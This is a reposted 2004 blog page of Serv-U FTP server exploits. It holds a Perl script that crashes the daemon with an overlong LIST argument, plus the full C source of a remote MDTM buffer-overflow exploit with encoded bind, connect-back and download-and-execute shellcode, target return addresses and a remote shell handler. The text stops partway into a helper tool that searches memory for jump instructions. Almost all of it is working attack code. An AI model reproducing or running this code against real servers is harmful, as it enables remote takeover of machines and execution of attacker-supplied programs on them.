版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本声明。
https://windtear.net/archives/2004/04/30/000522.html
Serv-U exploit <= 5.0.0.4
1.crash cmd <= 5.0.0.4
LIST -l:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----> ServUCrashReport.txt
************ SERV-U DAEMON CRASH REPORT ************
Date: Thu Apr 29 17:18:24 2004
Version: Version 5.0
Build: 5.0.0.4
Reason: SERVUD~1.EXE caused a EXCEPTION_ACCESS_VIOLATION in module SERVUD~1.EXE at 001B:004238A3, _GetExceptDLLinfo()+141386 byte(s)
Registers:
EAX=06E2029B EBX=00E500E4 ECX=00000000 EDX=00000000 ESI=FFFFFFF0
EDI=00E500E4 EBP=012DB4F0 ESP=012DB3A4 EIP=004238A3 FLG=00010286
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000
Stack Trace:
001B:004238A3 (0x012DBE1C 0x00E500E4 0x00000000 0x012DD248) SERVUD~1.EXE
001B:00422A93 (0x01E50034 0x012DD278 0x00000001 0x012DDA7C) SERVUD~1.EXE
001B:00421DE6 (0x01E50034 0x012DD278 0x012DE2D4 0x00E6013C) SERVUD~1.EXE
001B:00437837 (0x01E50034 0x00DF75A0 0x01E50034 0x01E50034) SERVUD~1.EXE
001B:00436FF2 (0x01E50034 0x012DE2D4 0x00DFDCA4 0x01E50034) SERVUD~1.EXE
001B:0043B63D (0x01E50034 0x00DF75A0 0x00DFDCA4 0x00000002) SERVUD~1.EXE
001B:004334DA (0x01E50034 0x00000008 0x00000002 0x00E10000) SERVUD~1.EXE
001B:0046C74E (0x00DFDCA4 0x00000200 0x00000008 0x012DFE74) SERVUD~1.EXE
001B:0049DBBA (0x0002001E 0x00000400 0x00000200 0x00000008) SERVUD~1.EXE
001B:77E1A2D0 (0x0049DAB8 0x0002001E 0x00000400 0x00000200) USER32.dll
001B:77DF45E5 (0x012DFE74 0x00000001 0x004013F5 0x012DFE74) USER32.dll
001B:77DF5B51 (0x00DE0038 0x011E0000 0x00EA0A88 0x00000001) USER32.dll
001B:0040206E (0x00000000 0x78700659 0x0013BBF0 0x00EA0A88) SERVUD~1.EXE
001B:006947B5 (0x00EA0A88 0x0069497C 0x012DFFEC 0x77E6B382) SERVUD~1.EXE
001B:006947EF (0x00EA0A88 0x78700659 0x0013BBF0 0x00EA0A88) SERVUD~1.EXE
001B:77E6B382 (0x00000000 0x00000000 0x00000000 0x00000000) KERNEL32.DLL
-----> crash.pl
#!/usr/bin/perl
use IO::Socket;
$host = "ftp.domain.ip";
$port = "21"
$user = "username";
$pass = "password";
$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
last;
}
}
$remote->autoflush(1);
my $ftp = "USER $user\r\n";
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/331 /)
{
last;
}
}
$ftp = join("", "PASS ", "$pass", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/230 /)
{
last;
}
}
my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/250 Done/)
{
last;
}
}
close $remote;
2.exploit < 5.0.0.4
lion
lion@cnhonker.net
http://www.cnhonker.com
2004-02-28 [HUC] Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command Remote Exploit
Servu2.c 20,889
2004-03-04 Serv-U Real Target and Search ASM Code Tool for Overflow Exploit.
Servu2.c 21,756
sac.cpp 12,848
-----> Servu2.c
/*
*-----------------------------------------------------------------------
*
* Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : lion@cnhonker.net
* : http://www.cnhonker.com
* Date : 2004-01-07
* Update : 2004-02-24 Who report this bug to Rhino??? Released v5.0.0.4 patched this bug.
* : 2004-02-17 v7.0 Add Download url file and exec shellcode.
* : 2004-02-04 v6.1 Modified to work with UNIX.
* : 2004-02-01 v6.0 Change decode and target, change 'jmp(call) ebx' addr to 'pop,pop,ret' addr, can attack winXP and win2003 now.
* : 2004-01-31 v5.0 Add msvcrt.dll jmp ebx addr, can use on CN/TW/EN/KR/other win2k SP4 if msvcrt.dll not changed.
* : 2004-01-26 v4.2 Change attack target, 2.x to '>= 2.5i' and '<= 2.5h'.
* : 2004-01-22 v4.1 Change connectback shellcode in one, change bind shellcode to rebind shellcode.
* : 2004-01-13 v4.0 Can attack Serv-U 2.x.
* : 2004-01-11 v3.1 Add "PORT" command, can penetrate through the firewall. (shport > 1024)
* : 2004-01-09 v3.0 Put shellcode in file parameter, can attack Serv-U 4.1.0.12
* : 2004-01-08 v2.0 Add connectback shellcode.
* : 2004-01-07 v1.0 Can attack Serv-U v3.0.0.16 ~ v4.1.0.11
* Tested : Windows 2000 Server EN/CN
* : + Serv-U v3.0.0.16 ~ v5.0.0.3
* : + Serv-U v2.5b, v2.5e, v2.5h, v2.5i, v2.5k
* : Windows XP EN/CN
* : + Serv-U v4.x
* Notice : *** Bug find by bkbll (bkbll@cnhonker.net) 2004-01-07 ***
* : *** You need a valid account. include anonymous!!! ***
* : *** Private exploit! Don't distributed it!!! ***
* Complie :On Windows
* : cl Servu2.c
* :On UNIX
* : gcc -o Servu2 Servu2.c -DUNIX
* Usage :e:\>Servu2
* :Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V7.0 (2004-01-07)
* :Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)
* :Welcome to HUC website http://www.cnhonker.com
* :Usage: Servu2 -i <ip> [Options]
* : -t Show All Target Type.
* :
* :[Options:]
* : -i Target IP Required
* : -t Target Type Default: 0
* : -u FTP Username Default: ftp
* : -p FTP Password Default: ftp@ftp.com
* : -f Port of the FTP Server Default: 21
* : -s Port of the Shell Default: 53
* : -c Connect back IP For connectback shellcode
* : -d Download the URL and Exec Start with 'http://' or 'ftp://'
*------------------------------------------------------------------------
*/
#ifndef UNIX
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32")
#else
#define uint32_t DWORD
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
#define closesocket(val) close(val)
#define SOCKET unsigned int
#define SOCKADDR_IN struct sockaddr_in
#define BOOL unsigned int
#define TRUE 1
#define FALSE 0
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define USHORT unsigned int
#define Sleep usleep
#define __leave goto exit_try
#define _snprintf snprintf
typedef struct sockaddr* LPSOCKADDR;
#endif
#ifdef UNIX
int GetLastError()
{
return errno;
}
int WSAGetLastError()
{
return errno;
}
#endif
#define MAX_LEN 2048
#define SEH_OFFSET 48-1
#define JMP_OVER "\xeb\x06\xeb\x06"
#define VERSION "7.0"
// for rebind shellcode
#define BIND_OFFSET 113
// for connectback shellcode
#define PORT_OFFSET 95
#define IP_OFFSET 88
// default parameter
#define SHELLPORT 53
#define FTPPORT 21
#define DEFTYPE 0
#define DEFUSER "ftp"
#define DEFPASS "ftp@ftp.com"
// for Serv-U 2.x
#define READ_ADDR "\x01\x01\xfd\x7f"
#define READ_OFFSET 5+14+12
struct
{
DWORD dwJMP;
char *szDescription;
}targets[] =
{
{0x7801D07B,"Serv-U 3.x/4.x/5.x ALL 2K SP3/SP4"}, //msvcrt.dll pop,pop,ret addr
// {0x78010394,"Serv-U 3.x/4.x/5.x ALL 2K SP4"}, //msvcrt.dll pop,pop,ret addr
{0x77c22ca7,"Serv-U 3.x/4.x/5.x ALL XP SP1"}, //msvcrt.dll pop,pop,ret addr
// {0x7FFA1CB5,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all CN win2000,winxp,win2003
{0x7ffa1571,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all CN win2000,winxp,win2003
{0x7ffa1c1b,"Serv-U 3.x/4.x/5.x EN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all EN win2000,winxp,win2003
{0x7ffae617,"Serv-U 3.x/4.x/5.x TW 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all TW win2000,winxp,win2003
// {0x7ffa2186,"Serv-U 3.x/4.x/5.x TW 2K ALL"}, //jmp ebx addr for all TW win2000
{0x7ffa4a1b,"Serv-U 3.x/4.x/5.x KR 2K ALL"}, //jmp ebx addr for all KR win2000
{0x7ffa4512,"Serv-U 2.x >= 2.5i CN 2K/XP/2K3 ALL"}, //jmp esp addr for all CN win2000,winxp,win2003
{0x7ffa4512,"Serv-U 2.x <= 2.5h CN 2K/XP/2K3 ALL"}, //jmp esp addr for all CN win2000,winxp,win2003
{0x7ffa24ce,"Serv-U 2.x >= 2.5i TW 2K/XP/2K3 ALL"}, //jmp esp addr for all TW win2000,winxp,win2003
{0x7ffa24ce,"Serv-U 2.x <= 2.5h TW 2K/XP/2K3 ALL"}, //jmp esp addr for all TW win2000,winxp,win2003
{0x7ffa82a4,"Serv-U 2.x >= 2.5i KR 2K/XP/2K3 ALL"}, //call esp addr for all KR win2000,winxp,win2003
{0x7ffa82a4,"Serv-U 2.x <= 2.5h KR 2K/XP/2K3 ALL"}, //call esp addr for all KR win2000,winxp,win2003
{0x778e71a3,"Serv-U 2.x >= 2.5i EN 2K SP4"}, //setupapi.dll jmp esp addr
{0x778e71a3,"Serv-U 2.x <= 2.5h EN 2K SP4"}, //setupapi.dll jmp esp addr
// {0x7802ba77,"Serv-U test"},
},v;
unsigned char *szSend[4];
unsigned char szCommand[MAX_LEN];
// 28 bytes decode by lion for overwrite eip, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
// 31 bytes decode by lion for overwrite SEH, don't change this.
unsigned char decode2[]=
"\x5E\x5F\x5B\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43"
"\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion";
// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n";
// 344 bytes rebind shellcode by lion for Serv-U (xor with 0x99)
unsigned char sc[]=
"\x70\xBB\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x5B\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9E\xC0\x71\x30\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
"\xF3\x9B\x66\xCF\x8D\x12\x41\x5E\x9E\x98\x99\x99\x99\xF3\x9D\x14"
"\x8E\xCB\xF3\x9D\xF1\x66\x66\x99\x99\xCA\x66\xCF\x81\x5E\x9E\x9B"
"\x99\x99\xAC\x10\xDE\x9D\xF3\x89\xCE\xCA\x66\xCF\x85\xF3\x98\xCA"
"\x66\xCF\xB9\xC9\xC9\xCA\x66\xCF\xBD\x12\x41\xAA\x59\xF1\xFA\xF4"
"\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x8D\xC0\x10\x9D\x16"
"\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10\xC6\xD1\x10"
"\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8\xC8\xF3\x98"
"\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66"
"\xCF\x91\x72\x9E\x09\x09\x09\x09\x09\x09\x09\xCA\x66\xCF\xB1\x66"
"\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC7"
"\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x40\x67\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x6B\xCC\x59\x3D\x83\xE9\x5E\x3D\x34\xB7\x70"
"\x7C\xD0\x1F\xD0\x7E\xE0\x5F\xE0";
// 304 bytes connectback shellcode by lion for Serv-U (xor with 0x99)
unsigned char cbsc[]=
"\x70\x9C\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x05\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1A\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
"\xF3\x9B\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x99"
"\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD2\xAA\x59"
"\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x89\xC0"
"\x10\x9D\x16\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10"
"\xC6\xD1\x10\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8"
"\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66"
"\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xEC"
"\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF\xB9\x9A\x6C\x72\x9E\x09"
"\x09\x09\x09\x09\x09\x09\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96"
"\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86"
"\xEC\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A"
"\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x6F\x67\x66\x66\x17"
"\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52"
"\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0\x99";
// 194 bytes download url file and exec shellcode by lion (xor with 0x99)
// Tested on Serv-U 3.x/4.x/5.x
unsigned char dusc[]=
"\x70\x3D\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\xDD\x99\x99\x99"
"\x7B\x60\xF1\xF6\xF7\x99\x99\xF1\xEC\xEB\xF5\xF4\xCD\x66\x8F\x12"
"\x71\x71\xB7\x99\x99\x99\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCF"
"\x9D\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"
"\xAA\x59\xC9\xC9\xCA\xCE\xC9\x66\xCF\x89\x12\x45\xC9\xCA\x66\xCF"
"\x91\x66\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF"
"\x12\xEF\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27"
"\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC"
"\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44"
"\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\xCE\x66\x66\x66\x17\xD7"
"\x97\x75\x58\xE0\x7C\x21\x01\x67\x13\x97\xE7\x41\x7B\xEA\xAF\x83"
"\xB6\xE9";
// exec file url addr for download url file and exec shellcode
unsigned char downloadurl[255]= "";
void showtype()
{
int i;
// usage(p);
printf( "[Type]:\n");
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
}
}
void usage(char *p)
{
printf( "Usage:\t%s\t-i <ip> [Options]\n"
"\t\t-t\tShow All Target Type.\n\n"
"[Options:]\n"
"\t-i\tTarget IP Required\n"
"\t-t\tTarget Type Default: %d\n"
"\t-u\tFTP Username Default: %s\n"
"\t-p\tFTP Password Default: %s\n"
"\t-f\tPort of the FTP Server Default: %d\n"
"\t-s\tPort of the Shell Default: %d\n"
"\t-c\tConnect back IP For connectback shellcode\n"
"\t-d\tDownload the URL and Exec Start with 'http://' or 'ftp://'\n\n"
, p, DEFTYPE, DEFUSER, DEFPASS, FTPPORT, SHELLPORT);
//showtype();
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
}
}
}
int main(int argc, char **argv)
{
struct sockaddr_in sa, server, client;
#ifndef UNIX
WSADATA wsd;
#endif
SOCKET s, s2, s3;
int iErr, ret, len;
char szRecvBuff[MAX_LEN];
int i,j;
int iType =DEFTYPE, iPort=FTPPORT;
char *ip=NULL, *pUser=DEFUSER, *pPass=DEFPASS, *cbHost=NULL, *url;
char user[128], pass[128];
BOOL bCb=FALSE,bUrl=FALSE, bLocal=TRUE, b2x=FALSE;
unsigned short shport=SHELLPORT, shport2=0;
unsigned long cbip;
unsigned int timeout=5000, Reuse;
char penetrate[255],cbHost2[20];
printf( "Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V%s (2004-01-07)\r\n"
"Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)\r\n"
"Welcome to HUC website http://www.cnhonker.com\r\n\n"
, VERSION);
if(argc < 2)
{
usage(argv[0]);
return 1;
}
else if(argc == 2 && argv[1][1] == 't')
{
showtype();
return 1;
}
for(i=1;i<argc;i+=2)
{
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return -1;
}
// check parameter
if(i == argc-1)
{
usage(argv[0]);
return -1;
}
switch(argv[i][1])
{
case 'i':
ip=argv[i+1];
break;
case 't':
iType = atoi(argv[i+1]);
break;
case 'f':
iPort=atoi(argv[i+1]);
break;
case 'p':
pPass = argv[i+1];
break;
case 'u':
pUser=argv[i+1];
break;
case 's':
shport=atoi(argv[i+1]);
break;
case 'c':
cbHost=argv[i+1];
bCb=TRUE;
break;
case 'd':
url = argv[i+1];
bUrl=TRUE;
break;
}
}
if((!ip) || (!user) || (!pass))
{
usage(argv[0]);
printf("[-] Invalid parameter.\n");
return -1;
}
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return -1;
}
if(iPort <1 || iPort >65535 || shport <1 || shport > 65535)
{
usage(argv[0]);
printf("[-] Invalid port.\n");
return -1;
}
if(bUrl)
{
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 255)
{
usage(argv[0]);
printf("[-] Invalid url. Must start with 'http://','ftp://' and <255 bytes.\n");
return -1;
}
}
if(strstr(targets[iType].szDescription, "2.x"))
{
b2x = TRUE;
printf("[*] Attack Target is Serv-U 2.x.\r\n");
}
else
{
printf("[*] Attack Target is Serv-U 3.x/4.x/5.x.\r\n");
}
_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
user[sizeof(user)-1]='\0';
_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
pass[sizeof(pass)-1]='\0';
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode
// Penetrate through the firewall.
if(bCb && shport > 1024)
{
strncpy(cbHost2, cbHost, 20);
for(i=0;i<strlen(cbHost); i++)
{
if(cbHost[i] == '.')
cbHost2[i] = ',';
}
sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
//printf("%s", penetrate);
}
else
{
sprintf(penetrate,"TYPE I\r\n");
}
// fill the "MDTM" command
strcpy(szCommand, "MDTM 20031111111111+");
// fill the egg
for(i=0; i<SEH_OFFSET; i++)
{
strcat(szCommand, "\x90");
}
// ret addr
if(b2x)
{
// fill the egg
if(strstr(targets[iType].szDescription, "<"))
{
j = 8;
}
else
{
j = 4;
}
for(i=0; i<j; i++)
{
strcat(szCommand, "\x90");
}
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
memcpy(&szCommand[READ_OFFSET], &READ_ADDR, 4);
// fill the decode
strcat(szCommand, decode);
}
else
{
// fill the seh
for(i=0; i<0x10*1; i+=8)
//for(i=0; i<1; i++)
{
memcpy(&szCommand[strlen(szCommand)], &JMP_OVER, 4);
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
}
// fill the decode
strcat(szCommand, decode2);
}
// fill the space
strcat(szCommand, " ");
// fill the egg
for(i=0; i<0x10; i++)
{
strcat(szCommand, "\x90");
}
// fill the shellcode start sign
strcat(szCommand, sc_start);
// fill the shellcode
if(bCb)
{
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9999;
cbip = inet_addr(cbHost)^0x99999999;
memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
memcpy(&cbsc[IP_OFFSET], &cbip, 4);
strcat(szCommand, cbsc);
}
else
if(bUrl)
{
memset(downloadurl, 0, sizeof(downloadurl));
// download url exec shellcode
for(i=0;i<strlen(url);i++)
{
downloadurl[i] = url[i] ^ 0x99;
}
downloadurl[i] ^= 0x99;
strcat(szCommand, dusc);
strcat(szCommand, downloadurl);
}
else
{
// rebind shellcode
shport2 = htons(shport)^(u_short)0x9999;
memcpy(&sc[BIND_OFFSET], &shport2, 2);
strcat(szCommand, sc);
}
// fill the shellcode end sign
strcat(szCommand, sc_end);
// send end
strcat(szCommand, "\r\n");
if(strlen(szCommand) >= sizeof(szCommand))
{
printf("[-] stack buffer overflow.\n");
return -1;
}
//printf("send size %d:%s", strlen(szCommand), szCommand);
//printf("buffsize %d\r\n", strlen(szCommand)-5-2);
#ifndef UNIX
__try
#endif
{
#ifndef UNIX
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
#endif
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
#ifndef UNIX
sa.sin_addr.S_un.S_addr=inet_addr(ip);
#else
sa.sin_addr.s_addr=inet_addr(ip);
#endif
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
__leave;
}
printf("[+] Connect to %s:%d success.\n", ip, iPort);
if(bCb)
{
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family=AF_INET;
#ifndef UNIX
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
#else
server.sin_addr.s_addr=inet_addr(cbHost);
#endif
server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
{
printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
printf("[-] You must run nc get the shell.\n");
bLocal = FALSE;
//closesocket(s2);
//__leave;
}
else
{
printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
listen(s2, 1);
}
}
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv: %s", szRecvBuff);
if(szRecvBuff[0] == '5')
{
printf("[-] Server return a error Message.\r\n");
__leave;
}
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Send buffer error:%d.\n", WSAGetLastError());
__leave;
}
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send shellcode %d bytes.\n", iErr);
else
printf("[+] Send: %s", szSend[i]);
}
if(bUrl)
{
printf("[+] Target Download the file and exec: %s\r\n", url);
printf("[+] Success? Maybe!\r\n");
}
else
{
printf("[+] If you don't have a shell it didn't work.\n");
if(bCb)
{
if(bLocal)
{
printf("[+] Wait for shell...\n");
len = sizeof(client);
s3 = accept(s2, (struct sockaddr*)&client, &len);
if(s3 != INVALID_SOCKET)
{
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s3);
}
}
}
else
{
printf("[+] Connect to shell...\n");
Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s2);
}
}
}
#ifdef UNIX
exit_try:
#endif
#ifndef UNIX
__finally
#endif
{
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
#ifndef UNIX
WSACleanup();
#endif
}
return 0;
}
-----> sac.cpp
/*
************************************************************************************
*
* esp.cpp - Search ASM Code for Overflow exploit.
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : lion@cnhonker.net
* : http://www.cnhonker.com
* :
* Notice :1. The magic address found in msvcrt.dll on the same systems(for example,win2000 sp4) are universal, even they have diffrent system language.
* :2. The magic address found from the address 0x7ffa0000 is universal on the same language system(for example, the address can work on the Chinese Simplified win2k,winxp,win2003 system)
* :
* Date : 2004-01-28
* :
* Complie : cl sac.cpp
* :
* Usage :E:\>cl sac.cpp
* :
* :E:\>sac -r xpret -d nodll
* :
* :E:\>sac -r xpret -d msvcrt.dll
* :
* ----------------------------------------------------------------------------------
*
* ASM Code:
*
* call eax FF D0
* call ebx FF D3
* call ecx FF D1
* call edx FF D2
* call edi FF D7
* call esi FF D6
* call esp FF D4
* call ebp FF D5
*
* call [eax] FF 10
* call [ebx] FF 13
* call [ecx] FF 11
* call [edx] FF 12
* call [edi] FF 17
* call [esi] FF 16
* call [esp] FF 14 24
* call [ebp] FF 55 00
*
* jmp eax FF E0
* jmp ebx FF E3
* jmp ecx FF E1
* jmp edx FF E2
* jmp edi FF E7
* jmp esi FF E6
* jmp esp FF E4
* jmp ebp FF E5
*
* jmp [eax] FF 20
* jmp [ebx] FF 23
* jmp [ecx] FF 21
* jmp [edx] FF 22
* jmp [edi] FF 27
* jmp [esi] FF 26
* jmp [esp] FF 24 24
* jmp [ebp] FF 65 00
*
* push eax 50
* push ebx 53
* push ecx 51
* push edx 52
* push edi 57
* push esi 56
* push esp 54
* push ebp 55
*
* push [eax] FF 30
* push [ebx] FF 33
* push [ecx] FF 31
